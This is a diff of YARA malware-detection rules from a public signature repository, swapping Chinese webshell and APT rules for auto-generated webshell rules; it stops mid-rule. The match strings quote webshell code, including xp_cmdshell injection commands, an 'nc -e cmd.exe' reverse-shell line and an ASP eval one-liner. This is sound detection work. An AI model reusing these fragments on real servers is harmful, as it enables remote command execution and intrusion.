-		$s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii
-		$s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
-		$s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii
+		$s2 = "#popmsghello,are you all right?"
+		$s4 = "connect failed,check your network and remote ip."
 
 	condition:
-		filesize < 70KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Php_2 : FILE
+rule SIGNATURE_BASE_Icyfox007V1_10_Rar_Folder_Asp
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file php.html"
+		description = "Webshells Auto-generated - file asp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "66916e32-9471-54bd-944e-bb751b38d3b0"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L532-L552"
+		id = "52150b6a-2f60-5e6b-86d1-61bc0aeb4fa8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8799-L8810"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a7d5fcbd39071e0915c4ad914d31e00c7127bcfc"
-		logic_hash = "c08f62c3d468c2ebacd10fff6aa0c63bd303d627d487c070a9d22419bf6906cd"
+		hash = "2c412400b146b7b98d6e7755f7159bb9"
+		logic_hash = "3cc36668f0a2a6807b59c7da0b6e504b519a616ab63fb9f606eba5dc4a9e7e2f"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii
-		$s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii
-		$s3 = "<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>" fullword ascii
-		$s4 = "Powered by <a title=\"Build 20130112\" href=\"http://www.4ngel.net\" target=\"_b" ascii
-		$s5 = "formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\\'shell\\',null,this." ascii
-		$s6 = "secparam('IP Configurate',execute('ipconfig -all'));" fullword ascii
-		$s7 = "secparam('Hosts', @file_get_contents('/etc/hosts'));" fullword ascii
-		$s8 = "p('<p><a href=\"http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/\" target=" ascii
+		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
 
 	condition:
-		filesize < 100KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Ftp : FILE
+rule SIGNATURE_BASE_Byshell063_Ntboot_2
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file ftp.txt"
+		description = "Webshells Auto-generated - file ntboot.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "311de4b0-fa19-545a-8a65-a40b255b5b39"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L554-L573"
+		id = "9bcb401d-619b-54b8-be51-f0e3b6eb096c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8812-L8823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3495e6bcb5484e678ce4bae0bd1a420b7eb6ad1d"
-		logic_hash = "02eae9b19274ab7b816d7c336017af8f0fdd5273664eb37be92be12661f3ef1f"
+		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
+		logic_hash = "25df29000bb410c0ba1fec78920124f6eedbc2585541536239522d2b116270ab"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "';exec master.dbo.xp_cmdshell 'echo open " ascii
-		$s2 = "';exec master.dbo.xp_cmdshell 'ftp -s:';" ascii
-		$s3 = "';exec master.dbo.xp_cmdshell 'echo get lcx.exe" ascii
-		$s4 = "';exec master.dbo.xp_cmdshell 'echo get php.exe" ascii
-		$s5 = "';exec master.dbo.xp_cmdshell 'copy " ascii
-		$s6 = "ftp -s:d:\\ftp.txt " fullword ascii
-		$s7 = "echo bye>>d:\\ftp.txt " fullword ascii
+		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
 
 	condition:
-		filesize < 2KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Lcx : FILE
+rule SIGNATURE_BASE_U_Uay
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file lcx.c"
+		description = "Webshells Auto-generated - file uay.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4a4e8810-6dae-526e-86f0-43de45d1c87a"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L575-L592"
+		id = "6a670e19-6e53-5b13-aabf-fe74d48b9113"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8824-L8836"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ddb3b6a5c5c22692de539ccb796ede214862befe"
-		logic_hash = "48121824d3173b77b54b52dc60d3422a904ada46a6ebb20bb585086911cd8360"
+		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
+		logic_hash = "45e8938ce34fd5a253cee3867aa8c4429c6bf3fcc91098ed9df3f95656bc5f8f"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "printf(\"Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-l" ascii
-		$s2 = "sprintf(tmpbuf2,\"\\r\\n########### reply from %s:%d ####################\\r\\n" ascii
-		$s3 = "printf(\" 3: connect to HOST1:PORT1 and HOST2:PORT2\\r\\n\");" fullword ascii
-		$s4 = "printf(\"got,ip:%s,port:%d\\r\\n\",inet_ntoa(client1.sin_addr),ntohs(client1.sin" ascii
-		$s5 = "printf(\"[-] connect to host1 failed\\r\\n\");" fullword ascii
+		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
+		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
 
 	condition:
-		filesize < 25KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Txt_Jspcmd : FILE
+rule SIGNATURE_BASE_Bin_Wuaus
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file jspcmd.txt"
+		description = "Webshells Auto-generated - file wuaus.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L594-L608"
+		id = "50b5323b-d8d1-5350-bf93-8dde3d11fd87"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8837-L8853"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d4e789031b15adde89a4628afc759859e53e353"
-		logic_hash = "d2cbf753fbd9e261234e6beb6f79aecb407a368704ae09d907d128d04c242053"
+		hash = "46a365992bec7377b48a2263c49e4e7d"
+		logic_hash = "0509ca39662430c3ababf65ca3a6e9af95250163980829d90eddf5341168c864"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
-		$s4 = "out.print(\"Hi,Man 2015\");" fullword ascii
+		$s1 = "9(90989@9V9^9f9n9v9"
+		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
+		$s3 = ";(=@=G=O=T=X=\\="
+		$s4 = "TCP Send Error!!"
+		$s5 = "1\"1;1X1^1e1m1w1~1"
+		$s8 = "=$=)=/=<=Y=_=j=p=z="
 
 	condition:
-		filesize < 1KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Jsp : FILE
+rule SIGNATURE_BASE_Pwreveal
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file jsp.txt"
+		description = "Webshells Auto-generated - file pwreveal.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L610-L626"
+		id = "3d79dd13-9012-56e2-b42a-e6b3e204c601"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8854-L8868"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "74518faf08637c53095697071db09d34dbe8d676"
-		logic_hash = "039b145031cf1127cb1b2aeda063d578d9eb151559232d7e6049965111df1e28"
+		hash = "b4e8447826a45b76ca45ba151a97ad50"
+		logic_hash = "01c9582897c65e608d49a151fe9ade97b9a031d7d10f5fd4b4d0c2a3fd83e7b6"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
-		$s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
-		$s3 = "<option value=\\\"nc -e cmd.exe 192.168.230.1 4444\\\">nc</option>\"" fullword ascii
-		$s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
+		$s0 = "*<Blank - no es"
+		$s3 = "JDiamondCS "
+		$s8 = "sword set> [Leith=0 bytes]"
+		$s9 = "ION\\System\\Floating-"
 
 	condition:
-		filesize < 715KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Aspxlcx : FILE
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Xwhois
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspxlcx.txt"
+		description = "Webshells Auto-generated - file xwhois.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L628-L644"
+		id = "8f3b3bb2-5884-584a-8220-b6edbfebc8a3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8869-L8883"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "453dd3160db17d0d762e032818a5a10baf234e03"
-		logic_hash = "a6e41e6882e74b0dd55ec4afbf6f8708e28267657e304c97d1304266fe1fbc93"
+		hash = "0bc98bd576c80d921a3460f8be8816b4"
+		logic_hash = "75ee56dae5fde75ae4dc4bba835a96016781b747f3cff0dc6d52e665463a6070"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "public string remoteip = " ascii
-		$s2 = "=Dns.Resolve(host);" ascii
-		$s3 = "public string remoteport = " ascii
-		$s4 = "public class PortForward" ascii
+		$s1 = "rting! "
+		$s2 = "aTypCog("
+		$s5 = "Diamond"
+		$s6 = "r)r=rQreryr"
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 18KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Xiao : FILE
+rule SIGNATURE_BASE_Vanquish_2
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file xiao.txt"
+		description = "Webshells Auto-generated - file vanquish.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd375597-c343-5f7d-8574-23f700ff432b"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L646-L663"
+		id = "6736cad6-cba1-5b6f-ae05-e2b980280479"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8884-L8895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b3b98fb57f5f5ccdc42e746e32950834807903b7"
-		logic_hash = "e99c307482148e4d0eb660281fa70f2dcece200ac8aed032bbef41e421d2a155"
+		hash = "2dcb9055785a2ee01567f52b5a62b071"
+		logic_hash = "428dc4e6d8bcc888e6f99f69ee9f211aa029d3486b99b9716d09709dc391d9a2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
-		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
-		$s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii
-		$s4 = "function Command(cmd, str){" fullword ascii
-		$s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii
+		$s2 = "Vanquish - DLL injection failed:"
 
 	condition:
-		filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Aspx : FILE
+rule SIGNATURE_BASE_Down_Rar_Folder_Down
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspx.jpg"
+		description = "Webshells Auto-generated - file down.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L665-L681"
+		id = "4e0a0e03-4f01-5b58-807c-0934cdda77ab"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8896-L8907"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ce24e277746c317d887139a0d71dd250bfb0ed58"
-		logic_hash = "43c386bfa88db77801b0494d6a5e4406688f957ffedeb4d2ecdd244549dec708"
+		hash = "db47d7a12b3584a2e340567178886e71"
+		logic_hash = "bc666d6333d49a2b01553e1946fc304195193b9be92e26805474e64da61455da"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s2 = "Process[] p=Process.GetProcesses();" fullword ascii
-		$s3 = "Copyright &copy; 2009 Bin" ascii
-		$s4 = "<td colspan=\"5\">CmdShell&nbsp;&nbsp;:&nbsp;<input class=\"input\" runat=\"serv" ascii
+		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
 
 	condition:
-		filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Sql : FILE
+rule SIGNATURE_BASE_Cmdshell
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file Sql.txt"
+		description = "Webshells Auto-generated - file cmdShell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "586f23d4-3a04-520d-b75b-f9bbcf67ceeb"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L683-L699"
+		id = "be256fc4-8dc5-58e4-9ca2-5a1df936b8dd"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8908-L8919"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f7813f1dfa4eec9a90886c80b88aa38e2adc25d5"
-		logic_hash = "0712b6736d8bdc1f19b3494dc3aab9e9a04dde167b5f843e319755cd311e29bd"
+		hash = "8a9fef43209b5d2d4b81dfbb45182036"
+		logic_hash = "5e7c7537b355b162d58b8bce570b1f94a8e6b479856685a245ffaed8f9482680"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd=chr(34)&\"cmd.exe /c \"&request.form(\"cmd\")&\" > 8617.tmp\"&chr(34)" fullword ascii
-		$s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii
-		$s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii
-		$s4 = "session(\"login\")=\"\"" fullword ascii
+		$s1 = "if cmdPath=\"wscriptShell\" then"
 
 	condition:
-		filesize < 15KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Hello : FILE
+rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Nc
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file hello.txt"
+		description = "Webshells Auto-generated - file nc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42d01411-e333-543d-84a2-758c13bad2df"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L701-L717"
+		id = "106209fc-f957-5131-825b-8eb7835625e0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8920-L8934"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "697a9ebcea6a22a16ce1a51437fcb4e1a1d7f079"
-		logic_hash = "823a0a74b07c8f4821247b3cf0450069a9888d44ccd87144330da88594f260c0"
+		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
+		logic_hash = "6106758aedb33f8983f387a58fcd815c47f793cd2a7ea3b0ebed13dd1d5b6e83"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii
-		$s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii
-		$s2 = "myProcess.Start()" fullword ascii
-		$s3 = "<p align=\"center\"><a href=\"?action=cmd\" target=\"_blank\">" fullword ascii
+		$s0 = "WSOCK32.dll"
+		$s1 = "?bSUNKNOWNV"
+		$s7 = "p@gram Jm6h)"
+		$s8 = "ser32.dllCONFP@"
 
 	condition:
-		filesize < 25KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1 : FILE
+rule SIGNATURE_BASE_Portlessinst
 {
 	meta:
-		description = "Detects Turla Linux malware x64 x32"
-		author = "Leonardo S.p.A."
-		id = "2da75433-b1c1-51b3-8f7a-a4442ca3de96"
-		date = "2020-04-24"
-		modified = "2023-12-05"
-		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_penquin.yar#L2-L33"
+		description = "Webshells Auto-generated - file portlessinst.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c641c522-7844-5002-8ae7-4aaf60d1337d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8935-L8948"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1e07963c492f1e6264f01ee292e40b188ca325b76005d9d48e6dc198cb9bdcf4"
+		hash = "74213856fc61475443a91cd84e2a6c2f"
+		logic_hash = "72ca80de2ad2048d1fcbbffeebd0e4fd7d9d47d6736360674e6a85ef9943abe8"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
-		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
-		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
-		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
-		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
-		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
-		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "/root/.hsperfdata" ascii fullword
-		$ = "Desc| Filename | size |state|" ascii fullword
-		$ = "VS filesystem: %s" ascii fullword
-		$ = "File already exist on remote filesystem !" ascii fullword
-		$ = "/tmp/.sync.pid" ascii fullword
-		$ = "rem_fd: ssl " ascii fullword
-		$ = "TREX_PID=%u" ascii fullword
-		$ = "/tmp/.xdfg" ascii fullword
-		$ = "__we_are_happy__" ascii
-		$ = "/root/.sess" ascii fullword
+		$s2 = "Fail To Open Registry"
+		$s3 = "f<-WLEggDr\""
+		$s6 = "oMemoryCreateP"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1_Opcode : FILE
+rule SIGNATURE_BASE_Setupbdoor
 {
 	meta:
-		description = "Detects Turla Linux malware x64 x32"
-		author = "Leonardo S.p.A."
-		id = "03043f59-c81a-5423-bec1-6cd88f6e3c52"
-		date = "2020-04-24"
-		modified = "2023-12-05"
-		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_penquin.yar#L35-L66"
+		description = "Webshells Auto-generated - file SetupBDoor.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "055ff783-fa9f-5037-a3d6-88b58ec1612f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8949-L8960"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19524e6ec3b0d49ff9c85ce361ef1922b92e4f7876ddb7d6c9b209b5357080e3"
+		hash = "41f89e20398368e742eda4a3b45716b6"
+		logic_hash = "b4b6a0e4b9f8975d769d340a420af37dbc344d32c72447a8c56b05e985e6d806"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
-		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
-		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
-		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
-		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
-		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
-		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
-		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op0 = { 8D 41 05 32 06 48 FF C6 88 81 E0 80 69 00 }
-		$op1 = { 48FFC14883F94975E9 }
-		$op2 = { C7 05 9B 7D 29 00 1D 00 00 00 C7 05 2D 7B 29 00 65 74 68 30 C6 05 2A 7B 29 00 00 E8 }
-		$op3 = { BF FF FF FF FF E8 96 9D 0A 00 90 90 90 90 90 90 90 90 90 90 89 F0}
-		$op4 = { 88D380C305329AC1D60C08889A60A10F084283FA0876E9 }
-		$op5 = { 8B 8D 50 DF FF FF B8 09 00 00 00 89 44 24 04 89 0C 24 E8 DD E5 02 00 }
-		$op6 = { 8D 5A 05 32 9A 60 26 0C 08 88 9A 20 F4 0E 08 42 83 FA 48 76 EB }
-		$op7 = { 8D 4A 05 32 8A 25 26 0C 08 88 8A 20 F4 0E 08 42 83 FA 08 76 EB}
+		$s1 = "\\BDoor\\SetupBDoor"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Blackenergy3_Installer
+rule SIGNATURE_BASE_Phpshell_3
 {
 	meta:
-		description = "Matches unique code block for import name construction "
-		author = "Mike Schladt"
-		id = "4afeb7ac-ce8d-506c-9c97-db7ec6102490"
-		date = "2015-05-29"
-		modified = "2023-12-05"
-		reference = "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy_installer.yar#L2-L16"
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2f0ddfef-b3b5-592b-a9fb-fae4d825d0af"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8961-L8973"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "78387651dd9608fcdf6bfb9df8b84db4"
-		hash = "78636f7bbd52ea80d79b4e2a7882403092bbb02d"
